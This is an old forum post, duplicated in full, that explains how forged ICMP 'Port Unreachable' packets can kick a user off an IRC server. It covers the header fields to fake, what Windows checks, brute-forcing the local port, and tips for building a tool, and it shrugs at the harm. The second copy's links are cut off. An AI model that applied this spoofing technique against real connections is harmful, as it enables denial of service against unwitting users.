ICMP 'spoofing' - 07/07/03 05:29 AM
A while ago somone asked me if I still had MindBreadk.exe (A program that was designed to kick an user off of an IRC server) So that got me curious again and when I went to my usuall source of infromation (SR) he wasn't able to find his past research; so I did some of my own. I will try and explain basically how it works.
First off, here are the protocol specifications (RFCs) of the various things you need to have basic knowledge of.
IP: http://serialcoders.sytes.net/Download/RFC/rfc0791.txt
ICMP: http://serialcoders.sytes.net/Download/RFC/rfc0792.txt
TCP: http://serialcoders.sytes.net/Download/RFC/rfc0793.txt
This however was more helpfull to me, http://serialcoders.sytes.net/articles/tcp.txt
(Thanks to SR for hosting those)
When you have established a TCP connection to an IRC server your computer relies on the lower-level layer 'IP' to transfer the data from Client to Server, but if something goes wrong an attempt to report the error is done via an ICMP packet. When your computer gets an ICMP packet it thinks is valid it responds in various ways. One example is it cleans up the connection. The only problem with that is what is to stop anyone from saying they are someone their not? nothing. You can very easily send malformed packets saying for example you are an IRC server and that the port is no longer reachable. Type: 03 "Port Unreachable" The only thing on the OS'es I tested this 'attack' on (Win98, 2k, XP) seemed to care about was If it had a valid checksum, the local port was correct, and that it had some data.
The thing that I didn't get for awhile was where you put the IP and TCP header infromation since their is no assigned space for ports on an ICMP packet. You put it in the DATA section; the original IP header and the first 64 bits of the TCP header.
Which looks soemthing like this...
ver hl
0100 + 0101
tos
00
total length
xxxxxxxxxxxxxxxx
identification
xxxxxxxxxxxxxxxx
flags
0000000000000000
ttl
10000000
protocol
01
chk sum
xxxxxxxxxxxxxxxx
ip source
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
ip dest
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
---tcp----
source port
xxxxxxxxxxxxxxxx
dest port
xxxxxxxxxxxxxxxx
seq num
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
each character represents a bit. the X's are things you would want to change for your 'attack'.
Now your all "WTF IS ALL THAT CRAP", so let me explain.
Each ICMP packet has a fixed amount of headers, and an ICMP packet gets a ride on a IP packet. When an error occurs an ICMP packet is sent (wheter it fails or succeeds doesn't matter) well in the example attack of 'peering an irc cilent' there is a tcp connection between a user and the server. Now since the internet just trusts everyone, because there is no centeral server, we could say we are somone we are not. And by doing this that opens a whole new door of access. ICMP is alot easier to spoof because of what the receiving OS checks. If you were to send a fake TCP packet you would need to guess the SEQuence number along with an ACKnumber if there is one and those are each 32 bits not to mention the source port. 1,208,925,819,614,629,174,706,176 is an estimated amount of how many possible combinations of those variables... That is alot more time consuming than the 65535 estimated ports possible for a ICMP packet. The reason there is still a Source Port and Dest Port in an ICMP packet is because each ICMP packet contains the IP header and first 64 bits of TCP header the error-causing packet had. Which only the source ip/port and dest ip/port are checked; despite the SEQ number is included in the first 64 bits of the TCP header. When a OS decides an ICMP packet is valid it then proceeds to respond to it, eg: cleaning up a connection (closing). So an attacker could 'spoof' the Sources / Destinations and make the receiver close a connection it has established with another computer. I can't think of any good reason to kick a user off of an IRC but lots of people do it so who cares.
The trick is to guess the correct local port.. or just try them all.
I hope I gave you an idea of how it worked, if you don't understand a part or I didn't explain something very well please feel free to ask-thats what this board is for.
Note: If you are going to make a program for this remember that the 'victim' was sending to the server when the error happened (swap some info in the ICMP data)
First off, here are the protocol specifications (RFCs) of the various things you need to have basic knowledge of.
IP: http:/
ICMP: http:/
TCP: http:/
This however was more helpfull to me, http:/
(Thanks to SR for hosting those)
When you have established a TCP connection to an IRC server your computer relies on the lower-level layer 'IP' to transfer the data from Client to Server, but if something goes wrong an attempt to report the error is done via an ICMP packet. When your computer gets an ICMP packet it thinks is valid it responds in various ways. One example is it cleans up the connection. The only problem with that is what is to stop anyone from saying they are someone their not? nothing. You can very easily send malformed packets saying for example you are an IRC server and that the port is no longer reachable. Type: 03 "Port Unreachable" The only thing on the OS'es I tested this 'attack' on (Win98, 2k, XP) seemed to care about was If it had a valid checksum, the local port was correct, and that it had some data.
The thing that I didn't get for awhile was where you put the IP and TCP header infromation since their is no assigned space for ports on an ICMP packet. You put it in the DATA section; the original IP header and the first 64 bits of the TCP header.
Which looks soemthing like this...
ver hl
0100 + 0101
tos
00
total length
xxxxxxxxxxxxxxxx
identification
xxxxxxxxxxxxxxxx
flags
0000000000000000
ttl
10000000
protocol
01
chk sum
xxxxxxxxxxxxxxxx
ip source
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
ip dest
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
---tcp----
source port
xxxxxxxxxxxxxxxx
dest port
xxxxxxxxxxxxxxxx
seq num
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
each character represents a bit. the X's are things you would want to change for your 'attack'.
Now your all "WTF IS ALL THAT CRAP", so let me explain.
Each ICMP packet has a fixed amount of headers, and an ICMP packet gets a ride on a IP packet. When an error occurs an ICMP packet is sent (wheter it fails or succeeds doesn't matter) well in the example attack of 'peering an irc cilent' there is a tcp connection between a user and the server. Now since the internet just trusts everyone, because there is no centeral server, we could say we are somone we are not. And by doing this that opens a whole new door of access. ICMP is alot easier to spoof because of what the receiving OS checks. If you were to send a fake TCP packet you would need to guess the SEQuence number along with an ACKnumber if there is one and those are each 32 bits not to mention the source port. 1,208,925,819,614,629,174,706,176 is an estimated amount of how many possible combinations of those variables... That is alot more time consuming than the 65535 estimated ports possible for a ICMP packet. The reason there is still a Source Port and Dest Port in an ICMP packet is because each ICMP packet contains the IP header and first 64 bits of TCP header the error-causing packet had. Which only the source ip/port and dest ip/port are checked; despite the SEQ number is included in the first 64 bits of the TCP header. When a OS decides an ICMP packet is valid it then proceeds to respond to it, eg: cleaning up a connection (closing). So an attacker could 'spoof' the Sources / Destinations and make the receiver close a connection it has established with another computer. I can't think of any good reason to kick a user off of an IRC but lots of people do it so who cares.
The trick is to guess the correct local port.. or just try them all.
I hope I gave you an idea of how it worked, if you don't understand a part or I didn't explain something very well please feel free to ask-thats what this board is for.
Note: If you are going to make a program for this remember that the 'victim' was sending to the server when the error happened (swap some info in the ICMP data)